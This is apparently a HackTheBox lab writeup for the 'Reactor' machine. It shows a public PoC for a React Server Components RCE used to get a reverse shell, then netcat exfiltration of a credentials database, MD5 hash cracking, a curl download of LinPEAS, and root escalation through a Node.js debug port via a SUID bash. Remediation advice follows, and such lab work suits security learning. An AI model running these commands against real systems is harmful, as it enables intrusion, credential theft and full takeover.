Reactor
Overview
| Field | Details |
|---|---|
| Machine Name | Reactor |
| Operating System | Linux (Ubuntu 24.04 LTS) |
| Difficulty | Medium |
| Attack IP | 10.10.14.77 |
| Target IP | 10.129.5.40 |
| Status | Pwned |
Executive Summary
This writeup documents my approach to compromising the HackTheBox machine "Reactor." The engagement involved exploiting a known Remote Code Execution vulnerability in a React Server Components implementation to gain initial access, recovering and cracking credentials from a local database, and escalating privileges by abusing a misconfigured Node.js debug port running as root.
Methodology
I followed a structured penetration testing approach:
- Reconnaissance & Enumeration
- Vulnerability Identification
- Exploitation
- Post-Exploitation & Lateral Movement
- Privilege Escalation
- Reporting
Reconnaissance
I began with a service and version scan using Nmap to identify exposed attack surface:
bash
nmap -sV -sC 10.129.5.40
Findings:
| Port | Service | Details |
|---|---|---|
| 22 | SSH | OpenSSH |
| 3000 | HTTP | Next.js application |
Navigating to port 3000 revealed a web application identified as "ReactorWatch Monitoring Dashboard." I inspected the page source and bundled JavaScript to fingerprint the exact framework versions in use:
- Next.js: 15.0.3
- React: 19.0.0-rc-66855b96-20241106
Vulnerability Identification
Cross-referencing the identified versions against public vulnerability databases, I identified CVE-2025-55182 — a Remote Code Execution vulnerability affecting React Server Components in the identified version range. This vulnerability allows an unauthenticated attacker to execute arbitrary commands on the server through a malformed server action request.
References:
- CVE-2025-55182
- GitHub: github.com/zr0n/react2shell
Initial Foothold
I cloned the proof-of-concept exploit and installed its dependencies:
bash
git clone https://github.com/zr0n/react2shell
cd react2shell
npm install
Set up a reverse shell listener:
bash
nc -lvnp 4444
Executed the exploit targeting the vulnerable application:
bash
node react2shell.js http://10.129.5.40:3000 shell 10.10.14.77 4444
Result: Reverse shell obtained as user node.
Post-Exploitation
Credential Harvesting
I enumerated the application directory and identified a SQLite database:
find /opt -name "*.db" 2>/dev/null
# /opt/reactor-app/reactor.db
I exfiltrated the database to my attack machine using netcat:
Receiver (Kali):
nc -lvnp 9001 > reactor.db
Sender (Target):
cat /opt/reactor-app/reactor.db | nc 10.10.14.77 9001
Database Analysis
sqlite3 reactor.db
.tables
SELECT * FROM users;
Output:
admin|a203b22191d744a4e70ada5c101b17b8|administrator|admin@reactor.htb
engineer|39d97110eafe2a9a68639812cd271e8e|operator|engineer@reactor.htb
Hash Cracking
The password hashes were identified as MD5 (32-character hexadecimal). I formatted them for offline cracking:
echo 'admin:a203b22191d744a4e70ada5c101b17b8' > hashes.txt
echo 'engineer:39d97110eafe2a9a68639812cd271e8e' >> hashes.txt
john hashes.txt --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt
Result:
reactor1 (engineer)
SSH Access
Using the recovered credentials I authenticated via SSH:
bash
ssh engineer@10.129.5.40
# Password: reactor1
User Flag
cat ~/user.txt
d3c69fa65f8b7760cfd538ecd7c2f5a7
Privilege Escalation
Enumeration
I transferred and executed LinPEAS for automated privilege escalation enumeration:
# Kali — serve the script
python3 -m http.server 8000
# Target — download and execute
curl http://10.10.14.77:8000/linpeas.sh -o /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh
Vulnerability Identified — Node.js Debug Port
LinPEAS highlighted a critical misconfiguration in the running process list:
root 1419 /usr/bin/node --inspect=127.0.0.1:9229 /opt/uptime-monitor/worker.js
A Node.js process owned by root was running with the --inspect flag, which enables the V8 Inspector Protocol on port 9229. This protocol allows a connected debugger to evaluate arbitrary JavaScript within the process context. Since the process runs as root, any executed code inherits root privileges.
The port was bound to localhost only, requiring port forwarding to reach it externally.
Port Forwarding
I used SSH local port forwarding to tunnel the debug port to my attack machine:
bash
ssh -L 9229:127.0.0.1:9229 engineer@10.129.5.40
This maps 127.0.0.1:9229 on the target to localhost:9229 on my machine through the authenticated SSH tunnel.
Attaching the Debugger
I opened Chrome and navigated to the built-in inspector:
chrome://inspect
I clicked Configure, added localhost:9229, and the remote Node.js process appeared as an inspectable target. I clicked inspect to open a dedicated DevTools session connected to the root process.
Code Execution as Root
In the DevTools console I executed the following JavaScript to create a SUID copy of bash:
javascript
require('child_process').exec('cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash')
This uses Node's native child_process module to copy the bash binary to /tmp and apply the SUID bit, causing it to execute with the permissions of its owner — root.
Privilege Escalation
Back on the target I executed the SUID binary with the -p flag, which instructs bash to preserve the elevated effective user ID rather than dropping to the real user:
bash
/tmp/rootbash -p
whoami
root
Root Flag
cat /root/root.txt
de09ae48ae3ccb6e84b89d176cfadc75
Vulnerability Summary
| # | Vulnerability | Severity | Impact |
|---|---|---|---|
| 1 | CVE-2025-55182 — React Server Components RCE | Critical | Initial access as node user |
| 2 | Plaintext credentials in SQLite database | Medium | Credential recovery |
| 3 | Weak MD5 password hashing | Medium | Password recovery via offline cracking |
| 4 | Node.js --inspect port running as root | High | Full privilege escalation to root |
Remediation Recommendations
| Finding | Recommendation |
|---|---|
| Outdated React/Next.js | Update to latest stable versions |
| MD5 password hashing | Migrate to bcrypt or Argon2 |
| Node.js debug port in production | Remove --inspect flag from production services |
| Debug port running as root | Run services as least-privilege user |
Tools Used
- Nmap
- react2shell (CVE-2025-55182 PoC)
- SQLite3
- John the Ripper
- LinPEAS
- Chrome DevTools (V8 Inspector)
- Netcat
- SSH port forwarding
_This machine was completed as part of HackTheBox practice for developing offensive security skills in a legal, controlled environment._